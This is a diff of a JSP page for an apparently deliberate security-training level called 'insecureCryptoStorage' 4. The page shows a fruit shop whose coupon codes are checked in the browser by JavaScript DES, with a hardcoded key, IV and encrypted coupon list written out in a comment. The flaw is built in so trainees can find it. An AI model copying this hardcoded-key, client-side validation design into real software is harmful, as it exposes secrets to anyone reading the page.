-      var spfunction7 = new Array (0x200000,0x4200002,0x4000802,0,0x800,0x4000802,0x200802,0x4200800,0x4200802,0x200000,0,0x4000002,0x2,0x4000000,0x4200002,0x802,0x4000800,0x200802,0x200002,0x4000800,0x4000002,0x4200000,0x4200800,0x200002,0x4200000,0x800,0x802,0x4200802,0x200800,0x2,0x4000000,0x200800,0x4000000,0x200800,0x200000,0x4000802,0x4000802,0x4200002,0x4200002,0x2,0x200002,0x4000000,0x4000800,0x200000,0x4200800,0x802,0x200802,0x4200800,0x802,0x4000002,0x4200802,0x4200000,0x200800,0,0x2,0x4200802,0,0x200802,0x4200000,0x800,0x4000002,0x4000800,0x800,0x200002);
-      var spfunction8 = new Array (0x10001040,0x1000,0x40000,0x10041040,0x10000000,0x10001040,0x40,0x10000000,0x40040,0x10040000,0x10041040,0x41000,0x10041000,0x41040,0x1000,0x40,0x10040000,0x10000040,0x10001000,0x1040,0x41000,0x40040,0x10040040,0x10041000,0x1040,0,0,0x10040040,0x10000040,0x10001000,0x41040,0x40000,0x41040,0x40000,0x10041000,0x1000,0x40,0x10040040,0x1000,0x41040,0x10001000,0x40,0x10000040,0x10040000,0x10040040,0x10000000,0x40000,0x10001040,0,0x10041040,0x40040,0x10000040,0x10040000,0x10001000,0x10001040,0,0x10041040,0x41000,0x41000,0x1040,0x1040,0x40040,0x10000000,0x10041000);
-
-      //create the 16 or 48 subkeys we will need
-      var keys = des_createKeys (key);
-      var m=0, i, j, temp, temp2, right1, right2, left, right, looping;
-      var cbcleft, cbcleft2, cbcright, cbcright2
-      var endloop, loopinc;
-      var len = message.length;
-      var chunk = 0;
-      //set up the loops for single and triple des
-      var iterations = keys.length == 32 ? 3 : 9; //single or triple des
-      if (iterations == 3) {looping = encrypt ? new Array (0, 32, 2) : new Array (30, -2, -2);}
-      else {looping = encrypt ? new Array (0, 32, 2, 62, 30, -2, 64, 96, 2) : new Array (94, 62, -2, 32, 64, 2, 30, -2, -2);}
-
-      //pad the message depending on the padding parameter
-      if (padding == 2) message += "        "; //pad the message with spaces
-      else if (padding == 1) {temp = 8-(len%8); message += String.fromCharCode (temp,temp,temp,temp,temp,temp,temp,temp); if (temp==8) len+=8;} //PKCS7 padding
-      else if (!padding) message += "\0\0\0\0\0\0\0\0"; //pad the message out with null bytes
-
-      //store the result here
-      result = "";
-      tempresult = "";
-
-      if (mode == 1) { //CBC mode
-        cbcleft = (iv.charCodeAt(m++) << 24) | (iv.charCodeAt(m++) << 16) | (iv.charCodeAt(m++) << 8) | iv.charCodeAt(m++);
-        cbcright = (iv.charCodeAt(m++) << 24) | (iv.charCodeAt(m++) << 16) | (iv.charCodeAt(m++) << 8) | iv.charCodeAt(m++);
-        m=0;
-      }
-
-      //loop through each 64 bit chunk of the message
-      while (m < len) {
-        left = (message.charCodeAt(m++) << 24) | (message.charCodeAt(m++) << 16) | (message.charCodeAt(m++) << 8) | message.charCodeAt(m++);
-        right = (message.charCodeAt(m++) << 24) | (message.charCodeAt(m++) << 16) | (message.charCodeAt(m++) << 8) | message.charCodeAt(m++);
-
-        //for Cipher Block Chaining mode, xor the message with the previous result
-        if (mode == 1) {if (encrypt) {left ^= cbcleft; right ^= cbcright;} else {cbcleft2 = cbcleft; cbcright2 = cbcright; cbcleft = left; cbcright = right;}}
-
-        //first each 64 but chunk of the message must be permuted according to IP
-        temp = ((left >>> 4) ^ right) & 0x0f0f0f0f; right ^= temp; left ^= (temp << 4);
-        temp = ((left >>> 16) ^ right) & 0x0000ffff; right ^= temp; left ^= (temp << 16);
-        temp = ((right >>> 2) ^ left) & 0x33333333; left ^= temp; right ^= (temp << 2);
-        temp = ((right >>> 8) ^ left) & 0x00ff00ff; left ^= temp; right ^= (temp << 8);
-        temp = ((left >>> 1) ^ right) & 0x55555555; right ^= temp; left ^= (temp << 1);
-
-        left = ((left << 1) | (left >>> 31));
-        right = ((right << 1) | (right >>> 31));
-
-        //do this either 1 or 3 times for each chunk of the message
-        for (j=0; j<iterations; j+=3) {
-          endloop = looping[j+1];
-          loopinc = looping[j+2];
-          //now go through and perform the encryption or decryption
-          for (i=looping[j]; i!=endloop; i+=loopinc) { //for efficiency
-            right1 = right ^ keys[i];
-            right2 = ((right >>> 4) | (right << 28)) ^ keys[i+1];
-            //the result is attained by passing these bytes through the S selection functions
-            temp = left;
-            left = right;
-            right = temp ^ (spfunction2[(right1 >>> 24) & 0x3f] | spfunction4[(right1 >>> 16) & 0x3f]
-                  | spfunction6[(right1 >>>  8) & 0x3f] | spfunction8[right1 & 0x3f]
-                  | spfunction1[(right2 >>> 24) & 0x3f] | spfunction3[(right2 >>> 16) & 0x3f]
-                  | spfunction5[(right2 >>>  8) & 0x3f] | spfunction7[right2 & 0x3f]);
-          }
-          temp = left; left = right; right = temp; //unreverse left and right
-        } //for either 1 or 3 iterations
-
-        //move then each one bit to the right
-        left = ((left >>> 1) | (left << 31));
-        right = ((right >>> 1) | (right << 31));
-
-        //now perform IP-1, which is IP in the opposite direction
-        temp = ((left >>> 1) ^ right) & 0x55555555; right ^= temp; left ^= (temp << 1);
-        temp = ((right >>> 8) ^ left) & 0x00ff00ff; left ^= temp; right ^= (temp << 8);
-        temp = ((right >>> 2) ^ left) & 0x33333333; left ^= temp; right ^= (temp << 2);
-        temp = ((left >>> 16) ^ right) & 0x0000ffff; right ^= temp; left ^= (temp << 16);
-        temp = ((left >>> 4) ^ right) & 0x0f0f0f0f; right ^= temp; left ^= (temp << 4);
-
-        //for Cipher Block Chaining mode, xor the message with the previous result
-        if (mode == 1) {if (encrypt) {cbcleft = left; cbcright = right;} else {left ^= cbcleft2; right ^= cbcright2;}}
-        tempresult += String.fromCharCode ((left>>>24), ((left>>>16) & 0xff), ((left>>>8) & 0xff), (left & 0xff), (right>>>24), ((right>>>16) & 0xff), ((right>>>8) & 0xff), (right & 0xff));
-
-        chunk += 8;
-        if (chunk == 512) {result += tempresult; tempresult = ""; chunk = 0;}
-      } //for every 8 characters, or 64 bits in the message
-
-      //return the result as an array
-      result += tempresult;
-      result = result.replace(/\0*$/g, "");
-      return result;
-    } //end of des
-
-
-
-    //des_createKeys
-    //this takes as input a 64 bit key (even though only 56 bits are used)
-    //as an array of 2 integers, and returns 16 48 bit keys
-    function des_createKeys (key) {
-      //declaring this locally speeds things up a bit
-      pc2bytes0  = new Array (0,0x4,0x20000000,0x20000004,0x10000,0x10004,0x20010000,0x20010004,0x200,0x204,0x20000200,0x20000204,0x10200,0x10204,0x20010200,0x20010204);
-      pc2bytes1  = new Array (0,0x1,0x100000,0x100001,0x4000000,0x4000001,0x4100000,0x4100001,0x100,0x101,0x100100,0x100101,0x4000100,0x4000101,0x4100100,0x4100101);
-      pc2bytes2  = new Array (0,0x8,0x800,0x808,0x1000000,0x1000008,0x1000800,0x1000808,0,0x8,0x800,0x808,0x1000000,0x1000008,0x1000800,0x1000808);
-      pc2bytes3  = new Array (0,0x200000,0x8000000,0x8200000,0x2000,0x202000,0x8002000,0x8202000,0x20000,0x220000,0x8020000,0x8220000,0x22000,0x222000,0x8022000,0x8222000);
-      pc2bytes4  = new Array (0,0x40000,0x10,0x40010,0,0x40000,0x10,0x40010,0x1000,0x41000,0x1010,0x41010,0x1000,0x41000,0x1010,0x41010);
-      pc2bytes5  = new Array (0,0x400,0x20,0x420,0,0x400,0x20,0x420,0x2000000,0x2000400,0x2000020,0x2000420,0x2000000,0x2000400,0x2000020,0x2000420);
-      pc2bytes6  = new Array (0,0x10000000,0x80000,0x10080000,0x2,0x10000002,0x80002,0x10080002,0,0x10000000,0x80000,0x10080000,0x2,0x10000002,0x80002,0x10080002);
-      pc2bytes7  = new Array (0,0x10000,0x800,0x10800,0x20000000,0x20010000,0x20000800,0x20010800,0x20000,0x30000,0x20800,0x30800,0x20020000,0x20030000,0x20020800,0x20030800);
-      pc2bytes8  = new Array (0,0x40000,0,0x40000,0x2,0x40002,0x2,0x40002,0x2000000,0x2040000,0x2000000,0x2040000,0x2000002,0x2040002,0x2000002,0x2040002);
-      pc2bytes9  = new Array (0,0x10000000,0x8,0x10000008,0,0x10000000,0x8,0x10000008,0x400,0x10000400,0x408,0x10000408,0x400,0x10000400,0x408,0x10000408);
-      pc2bytes10 = new Array (0,0x20,0,0x20,0x100000,0x100020,0x100000,0x100020,0x2000,0x2020,0x2000,0x2020,0x102000,0x102020,0x102000,0x102020);
-      pc2bytes11 = new Array (0,0x1000000,0x200,0x1000200,0x200000,0x1200000,0x200200,0x1200200,0x4000000,0x5000000,0x4000200,0x5000200,0x4200000,0x5200000,0x4200200,0x5200200);
-      pc2bytes12 = new Array (0,0x1000,0x8000000,0x8001000,0x80000,0x81000,0x8080000,0x8081000,0x10,0x1010,0x8000010,0x8001010,0x80010,0x81010,0x8080010,0x8081010);
-      pc2bytes13 = new Array (0,0x4,0x100,0x104,0,0x4,0x100,0x104,0x1,0x5,0x101,0x105,0x1,0x5,0x101,0x105);
-
-      //how many iterations (1 for des, 3 for triple des)
-      var iterations = key.length > 8 ? 3 : 1; //changed by Paul 16/6/2007 to use Triple DES for 9+ byte keys
-      //stores the return keys
-      var keys = new Array (32 * iterations);
-      //now define the left shifts which need to be done
-      var shifts = new Array (0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0);
-      //other variables
-      var lefttemp, righttemp, m=0, n=0, temp;
-
-      for (var j=0; j<iterations; j++) { //either 1 or 3 iterations
-        left = (key.charCodeAt(m++) << 24) | (key.charCodeAt(m++) << 16) | (key.charCodeAt(m++) << 8) | key.charCodeAt(m++);
-        right = (key.charCodeAt(m++) << 24) | (key.charCodeAt(m++) << 16) | (key.charCodeAt(m++) << 8) | key.charCodeAt(m++);
-
-        temp = ((left >>> 4) ^ right) & 0x0f0f0f0f; right ^= temp; left ^= (temp << 4);
-        temp = ((right >>> -16) ^ left) & 0x0000ffff; left ^= temp; right ^= (temp << -16);
-        temp = ((left >>> 2) ^ right) & 0x33333333; right ^= temp; left ^= (temp << 2);
-        temp = ((right >>> -16) ^ left) & 0x0000ffff; left ^= temp; right ^= (temp << -16);
-        temp = ((left >>> 1) ^ right) & 0x55555555; right ^= temp; left ^= (temp << 1);
-        temp = ((right >>> 8) ^ left) & 0x00ff00ff; left ^= temp; right ^= (temp << 8);
-        temp = ((left >>> 1) ^ right) & 0x55555555; right ^= temp; left ^= (temp << 1);
-
-        //the right side needs to be shifted and to get the last four bits of the left side
-        temp = (left << 8) | ((right >>> 20) & 0x000000f0);
-        //left needs to be put upside down
-        left = (right << 24) | ((right << 8) & 0xff0000) | ((right >>> 8) & 0xff00) | ((right >>> 24) & 0xf0);
-        right = temp;
-
-        //now go through and perform these shifts on the left and right keys
-        for (i=0; i < shifts.length; i++) {
-          //shift the keys either one or two bits to the left
-          if (shifts[i]) {left = (left << 2) | (left >>> 26); right = (right << 2) | (right >>> 26);}
-          else {left = (left << 1) | (left >>> 27); right = (right << 1) | (right >>> 27);}
-          left &= -0xf; right &= -0xf;
-
-          //now apply PC-2, in such a way that E is easier when encrypting or decrypting
-          //this conversion will look like PC-2 except only the last 6 bits of each byte are used
-          //rather than 48 consecutive bits and the order of lines will be according to
-          //how the S selection functions will be applied: S2, S4, S6, S8, S1, S3, S5, S7
-          lefttemp = pc2bytes0[left >>> 28] | pc2bytes1[(left >>> 24) & 0xf]
-                  | pc2bytes2[(left >>> 20) & 0xf] | pc2bytes3[(left >>> 16) & 0xf]
-                  | pc2bytes4[(left >>> 12) & 0xf] | pc2bytes5[(left >>> 8) & 0xf]
-                  | pc2bytes6[(left >>> 4) & 0xf];
-          righttemp = pc2bytes7[right >>> 28] | pc2bytes8[(right >>> 24) & 0xf]
-                    | pc2bytes9[(right >>> 20) & 0xf] | pc2bytes10[(right >>> 16) & 0xf]
-                    | pc2bytes11[(right >>> 12) & 0xf] | pc2bytes12[(right >>> 8) & 0xf]
-                    | pc2bytes13[(right >>> 4) & 0xf];
-          temp = ((righttemp >>> 16) ^ lefttemp) & 0x0000ffff;
-          keys[n++] = lefttemp ^ temp; keys[n++] = righttemp ^ (temp << 16);
-        }
-      } //for each iterations
-      //return the keys we've created
-      return keys;
-    } //end of des_createKeys
-
-    var bits = ["048ccd1fb6067ee0e304dc2025b96f4b", "296b66f3e332ab4c27501ca175c3b34d", "048ccd1fb6067ee0d4ca5da7e899def6", "bad5ede188bd1df1db8b06031867621a", "048ccd1fb6067ee0d6bd98bdb9a1a9b8a3f09b75107ca0da", "f316e31f45811c72c4e04380eac44e13", "47e046fb250a0b95cade3eff4ebda29c93157b2fc01c2430", "296b66f3e332ab4c27501ca175c3b34d"];
-
-    function chars_from_hex(inputstr) {
-        var outputstr = '';
-        inputstr = inputstr.replace(/^(0x)?/g, '');
-        inputstr = inputstr.replace(/[^A-Fa-f0-9]/g, '');
-        inputstr = inputstr.split('');
-        for(var i=0; i<inputstr.length; i+=2) {
-            outputstr += String.fromCharCode(parseInt(inputstr[i]+''+inputstr[i+1], 16));
-        }
-        return outputstr;
-    }
-
-    function hex_from_chars(inputstr) {
-        var delimiter = '';
-        var outputstr = '';
-        var hex = "0123456789abcdef";
-        hex = hex.split('');
-        var i, n;
-        var inputarr = inputstr.split('');
-        for(var i=0; i<inputarr.length; i++) {
-            if(i > 0) outputstr += delimiter;
-            if(!delimiter && i % 32 == 0 && i > 0) outputstr += '\n';
-            n = inputstr.charCodeAt(i);
-            outputstr += hex[(n >> 4) & 0xf] + hex[n & 0xf];
-        }
-        return outputstr;
-    }
-
-    function checkCoupon (code) {
-        var theCode = hex_from_chars(des(chars_from_hex('0ba950d08830c8079bded71b852934453db8f4ffff1f5842'), code, 1, chars_from_hex('821fd38b9a7c0247') ? 1 : 0, chars_from_hex('821fd38b9a7c0247')));
-        var a = bits.indexOf(theCode);
-        if(a < 0)
-            return false;
-        else
-            return true;
-    }
-    */
-
-%>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("insecureCryptoStorage.4.whatToDo") %>
+			<br /> <br />
+		<h3 class="title"><%= bundle.getString("insecureCryptoStorage.4.shop") %></h3>
+		<p><%= bundle.getString("insecureCryptoStorage.4.shop.message.1") %>
+			<a>PleaseTakeAFruit</a>
+			<%= bundle.getString("insecureCryptoStorage.4.shop.message.2") %>
+			<a>FruitForFree</a>
+			<%= bundle.getString("insecureCryptoStorage.4.shop.message.3") %></p>
+		<br /> <br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<!-- Header -->
+				<tr>
+					<th><%= bundle.getString("insecureCryptoStorage.4.shop.picture") %></th>
+					<th><%= bundle.getString("insecureCryptoStorage.4.shop.cost") %></th>
+					<th><%= bundle.getString("insecureCryptoStorage.4.shop.quantity") %></th>
+				</tr>
+				<!-- Apple Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%= levelHash %>/apple.jpg" /></td>
+					<td>$45</td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfApples" autocomplete="off" />
+				</tr>
+				<!-- Banana Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%= levelHash %>/banana.jpg" /></td>
+					<td>$15</td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfBananas" autocomplete="off" />
+				</tr>
+				<!-- Oranges Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%= levelHash %>/orange.jpg" /></td>
+					<td>$3000</td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfOranges" autocomplete="off" />
+				</tr>
+				<!-- Pineapples Row -->
+				<tr>
+					<td><img width="50px" height="50px"
+						src="<%= levelHash %>/pineapple.png" /></td>
+					<td>$30</td>
+					<td><input type="text" style="width: 50px" value="0"
+						id="numberOfPineapples" autocomplete="off" />
+				</tr>
+			</table>
+			<p><%= bundle.getString("insecureCryptoStorage.4.shop.howToShop") %></p>
+			<table>
+				<tr>
+					<td><%= bundle.getString("insecureCryptoStorage.4.shop.couponCode") %></td>
+					<td><input type="text" id="couponCode" autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td colspons=2>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("insecureCryptoStorage.4.shop.submit") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("insecureCryptoStorage.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
+
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				var thePineappleAmount = $("#numberOfPineapples").val();
+				var theOrangeAmount = $("#numberOfOranges").val();
+				var theAppleAmount = $("#numberOfApples").val();
+				var theBananaAmount = $("#numberOfBananas").val();
+				var theCouponCode = $("#couponCode").val();
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							pineappleAmount: thePineappleAmount, 
+							orangeAmount: theOrangeAmount,
+							appleAmount: theAppleAmount, 
+							bananaAmount: theBananaAmount,
+							couponCode: theCouponCode
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("insecureCryptoStorage.errorOccurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<script src="<%= levelHash %>/couponCheck.js"></script>
+	<script>
+		$('#couponCode').change(function(){
+			if(!checkCoupon($('#couponCode').val())){
+				$('#couponCode').css("background-color", "#E06666");
+			}
+			else{
+				$('#couponCode').css("background-color", "#66E066");
+			}
+		});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
+	<%
+		/*
+		Clean Code Version of obfusticated couponCheck.js
+		
+		//DES in JS by Paul Tero, July 2001
+		//http://www.tero.co.uk/des/
+		//
+		//Optimised for performance with large blocks by Michael Hayworth, November 2001
+		//http://www.netdealing.com
+		//
+		//THIS SOFTWARE IS PROVIDED "AS IS" AND
+		//ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+		//IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+		//ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+		//FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+		//DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+		//OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+		//HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+		//LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+		//OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+		//SUCH DAMAGE.
+
+		//des
+		//this takes the key, the message, and whether to encrypt or decrypt
+		function des (key, message, encrypt, mode, iv, padding) {
+		  //declaring this locally speeds things up a bit
+		  var spfunction1 = new Array (0x1010400,0,0x10000,0x1010404,0x1010004,0x10404,0x4,0x10000,0x400,0x1010400,0x1010404,0x400,0x1000404,0x1010004,0x1000000,0x4,0x404,0x1000400,0x1000400,0x10400,0x10400,0x1010000,0x1010000,0x1000404,0x10004,0x1000004,0x1000004,0x10004,0,0x404,0x10404,0x1000000,0x10000,0x1010404,0x4,0x1010000,0x1010400,0x1000000,0x1000000,0x400,0x1010004,0x10000,0x10400,0x1000004,0x400,0x4,0x1000404,0x10404,0x1010404,0x10004,0x1010000,0x1000404,0x1000004,0x404,0x10404,0x1010400,0x404,0x1000400,0x1000400,0,0x10004,0x10400,0,0x1010004);
+		  var spfunction2 = new Array (-0x7fef7fe0,-0x7fff8000,0x8000,0x108020,0x100000,0x20,-0x7fefffe0,-0x7fff7fe0,-0x7fffffe0,-0x7fef7fe0,-0x7fef8000,-0x80000000,-0x7fff8000,0x100000,0x20,-0x7fefffe0,0x108000,0x100020,-0x7fff7fe0,0,-0x80000000,0x8000,0x108020,-0x7ff00000,0x100020,-0x7fffffe0,0,0x108000,0x8020,-0x7fef8000,-0x7ff00000,0x8020,0,0x108020,-0x7fefffe0,0x100000,-0x7fff7fe0,-0x7ff00000,-0x7fef8000,0x8000,-0x7ff00000,-0x7fff8000,0x20,-0x7fef7fe0,0x108020,0x20,0x8000,-0x80000000,0x8020,-0x7fef8000,0x100000,-0x7fffffe0,0x100020,-0x7fff7fe0,-0x7fffffe0,0x100020,0x108000,0,-0x7fff8000,0x8020,-0x80000000,-0x7fefffe0,-0x7fef7fe0,0x108000);
+		  var spfunction3 = new Array (0x208,0x8020200,0,0x8020008,0x8000200,0,0x20208,0x8000200,0x20008,0x8000008,0x8000008,0x20000,0x8020208,0x20008,0x8020000,0x208,0x8000000,0x8,0x8020200,0x200,0x20200,0x8020000,0x8020008,0x20208,0x8000208,0x20200,0x20000,0x8000208,0x8,0x8020208,0x200,0x8000000,0x8020200,0x8000000,0x20008,0x208,0x20000,0x8020200,0x8000200,0,0x200,0x20008,0x8020208,0x8000200,0x8000008,0x200,0,0x8020008,0x8000208,0x20000,0x8000000,0x8020208,0x8,0x20208,0x20200,0x8000008,0x8020000,0x8000208,0x208,0x8020000,0x20208,0x8,0x8020008,0x20200);
+		  var spfunction4 = new Array (0x802001,0x2081,0x2081,0x80,0x802080,0x800081,0x800001,0x2001,0,0x802000,0x802000,0x802081,0x81,0,0x800080,0x800001,0x1,0x2000,0x800000,0x802001,0x80,0x800000,0x2001,0x2080,0x800081,0x1,0x2080,0x800080,0x2000,0x802080,0x802081,0x81,0x800080,0x800001,0x802000,0x802081,0x81,0,0,0x802000,0x2080,0x800080,0x800081,0x1,0x802001,0x2081,0x2081,0x80,0x802081,0x81,0x1,0x2000,0x800001,0x2001,0x802080,0x800081,0x2001,0x2080,0x800000,0x802001,0x80,0x800000,0x2000,0x802080);
+		  var spfunction5 = new Array (0x100,0x2080100,0x2080000,0x42000100,0x80000,0x100,0x40000000,0x2080000,0x40080100,0x80000,0x2000100,0x40080100,0x42000100,0x42080000,0x80100,0x40000000,0x2000000,0x40080000,0x40080000,0,0x40000100,0x42080100,0x42080100,0x2000100,0x42080000,0x40000100,0,0x42000000,0x2080100,0x2000000,0x42000000,0x80100,0x80000,0x42000100,0x100,0x2000000,0x40000000,0x2080000,0x42000100,0x40080100,0x2000100,0x40000000,0x42080000,0x2080100,0x40080100,0x100,0x2000000,0x42080000,0x42080100,0x80100,0x42000000,0x42080100,0x2080000,0,0x40080000,0x42000000,0x80100,0x2000100,0x40000100,0x80000,0,0x40080000,0x2080100,0x40000100);
+		  var spfunction6 = new Array (0x20000010,0x20400000,0x4000,0x20404010,0x20400000,0x10,0x20404010,0x400000,0x20004000,0x404010,0x400000,0x20000010,0x400010,0x20004000,0x20000000,0x4010,0,0x400010,0x20004010,0x4000,0x404000,0x20004010,0x10,0x20400010,0x20400010,0,0x404010,0x20404000,0x4010,0x404000,0x20404000,0x20000000,0x20004000,0x10,0x20400010,0x404000,0x20404010,0x400000,0x4010,0x20000010,0x400000,0x20004000,0x20000000,0x4010,0x20000010,0x20404010,0x404000,0x20400000,0x404010,0x20404000,0,0x20400010,0x10,0x4000,0x20400000,0x404010,0x4000,0x400010,0x20004010,0,0x20404000,0x20000000,0x400010,0x20004010);
+		  var spfunction7 = new Array (0x200000,0x4200002,0x4000802,0,0x800,0x4000802,0x200802,0x4200800,0x4200802,0x200000,0,0x4000002,0x2,0x4000000,0x4200002,0x802,0x4000800,0x200802,0x200002,0x4000800,0x4000002,0x4200000,0x4200800,0x200002,0x4200000,0x800,0x802,0x4200802,0x200800,0x2,0x4000000,0x200800,0x4000000,0x200800,0x200000,0x4000802,0x4000802,0x4200002,0x4200002,0x2,0x200002,0x4000000,0x4000800,0x200000,0x4200800,0x802,0x200802,0x4200800,0x802,0x4000002,0x4200802,0x4200000,0x200800,0,0x2,0x4200802,0,0x200802,0x4200000,0x800,0x4000002,0x4000800,0x800,0x200002);
+		  var spfunction8 = new Array (0x10001040,0x1000,0x40000,0x10041040,0x10000000,0x10001040,0x40,0x10000000,0x40040,0x10040000,0x10041040,0x41000,0x10041000,0x41040,0x1000,0x40,0x10040000,0x10000040,0x10001000,0x1040,0x41000,0x40040,0x10040040,0x10041000,0x1040,0,0,0x10040040,0x10000040,0x10001000,0x41040,0x40000,0x41040,0x40000,0x10041000,0x1000,0x40,0x10040040,0x1000,0x41040,0x10001000,0x40,0x10000040,0x10040000,0x10040040,0x10000000,0x40000,0x10001040,0,0x10041040,0x40040,0x10000040,0x10040000,0x10001000,0x10001040,0,0x10041040,0x41000,0x41000,0x1040,0x1040,0x40040,0x10000000,0x10041000);
+
+		  //create the 16 or 48 subkeys we will need
+		  var keys = des_createKeys (key);
+		  var m=0, i, j, temp, temp2, right1, right2, left, right, looping;
+		  var cbcleft, cbcleft2, cbcright, cbcright2
+		  var endloop, loopinc;
+		  var len = message.length;
+		  var chunk = 0;
+		  //set up the loops for single and triple des
+		  var iterations = keys.length == 32 ? 3 : 9; //single or triple des
+		  if (iterations == 3) {looping = encrypt ? new Array (0, 32, 2) : new Array (30, -2, -2);}
+		  else {looping = encrypt ? new Array (0, 32, 2, 62, 30, -2, 64, 96, 2) : new Array (94, 62, -2, 32, 64, 2, 30, -2, -2);}
+
+		  //pad the message depending on the padding parameter
+		  if (padding == 2) message += "        "; //pad the message with spaces
+		  else if (padding == 1) {temp = 8-(len%8); message += String.fromCharCode (temp,temp,temp,temp,temp,temp,temp,temp); if (temp==8) len+=8;} //PKCS7 padding
+		  else if (!padding) message += "\0\0\0\0\0\0\0\0"; //pad the message out with null bytes
+
+		  //store the result here
+		  result = "";
+		  tempresult = "";
+
+		  if (mode == 1) { //CBC mode
+		    cbcleft = (iv.charCodeAt(m++) << 24) | (iv.charCodeAt(m++) << 16) | (iv.charCodeAt(m++) << 8) | iv.charCodeAt(m++);
+		    cbcright = (iv.charCodeAt(m++) << 24) | (iv.charCodeAt(m++) << 16) | (iv.charCodeAt(m++) << 8) | iv.charCodeAt(m++);
+		    m=0;
+		  }
+
+		  //loop through each 64 bit chunk of the message
+		  while (m < len) {
+		    left = (message.charCodeAt(m++) << 24) | (message.charCodeAt(m++) << 16) | (message.charCodeAt(m++) << 8) | message.charCodeAt(m++);
+		    right = (message.charCodeAt(m++) << 24) | (message.charCodeAt(m++) << 16) | (message.charCodeAt(m++) << 8) | message.charCodeAt(m++);
+
+		    //for Cipher Block Chaining mode, xor the message with the previous result
+		    if (mode == 1) {if (encrypt) {left ^= cbcleft; right ^= cbcright;} else {cbcleft2 = cbcleft; cbcright2 = cbcright; cbcleft = left; cbcright = right;}}
+
+		    //first each 64 but chunk of the message must be permuted according to IP
+		    temp = ((left >>> 4) ^ right) & 0x0f0f0f0f; right ^= temp; left ^= (temp << 4);
+		    temp = ((left >>> 16) ^ right) & 0x0000ffff; right ^= temp; left ^= (temp << 16);
+		    temp = ((right >>> 2) ^ left) & 0x33333333; left ^= temp; right ^= (temp << 2);
+		    temp = ((right >>> 8) ^ left) & 0x00ff00ff; left ^= temp; right ^= (temp << 8);
+		    temp = ((left >>> 1) ^ right) & 0x55555555; right ^= temp; left ^= (temp << 1);
+
+		    left = ((left << 1) | (left >>> 31)); 
+		    right = ((right << 1) | (right >>> 31)); 
+
+		    //do this either 1 or 3 times for each chunk of the message
+		    for (j=0; j<iterations; j+=3) {
+		      endloop = looping[j+1];
+		      loopinc = looping[j+2];
+		      //now go through and perform the encryption or decryption  
+		      for (i=looping[j]; i!=endloop; i+=loopinc) { //for efficiency
+		        right1 = right ^ keys[i]; 
+		        right2 = ((right >>> 4) | (right << 28)) ^ keys[i+1];
+		        //the result is attained by passing these bytes through the S selection functions
+		        temp = left;
+		        left = right;
+		        right = temp ^ (spfunction2[(right1 >>> 24) & 0x3f] | spfunction4[(right1 >>> 16) & 0x3f]
+		              | spfunction6[(right1 >>>  8) & 0x3f] | spfunction8[right1 & 0x3f]
+		              | spfunction1[(right2 >>> 24) & 0x3f] | spfunction3[(right2 >>> 16) & 0x3f]
+		              | spfunction5[(right2 >>>  8) & 0x3f] | spfunction7[right2 & 0x3f]);
+		      }
+		      temp = left; left = right; right = temp; //unreverse left and right
+		    } //for either 1 or 3 iterations
+
+		    //move then each one bit to the right
+		    left = ((left >>> 1) | (left << 31)); 
+		    right = ((right >>> 1) | (right << 31)); 
+
+		    //now perform IP-1, which is IP in the opposite direction
+		    temp = ((left >>> 1) ^ right) & 0x55555555; right ^= temp; left ^= (temp << 1);
+		    temp = ((right >>> 8) ^ left) & 0x00ff00ff; left ^= temp; right ^= (temp << 8);
+		    temp = ((right >>> 2) ^ left) & 0x33333333; left ^= temp; right ^= (temp << 2);
+		    temp = ((left >>> 16) ^ right) & 0x0000ffff; right ^= temp; left ^= (temp << 16);
+		    temp = ((left >>> 4) ^ right) & 0x0f0f0f0f; right ^= temp; left ^= (temp << 4);
+
+		    //for Cipher Block Chaining mode, xor the message with the previous result
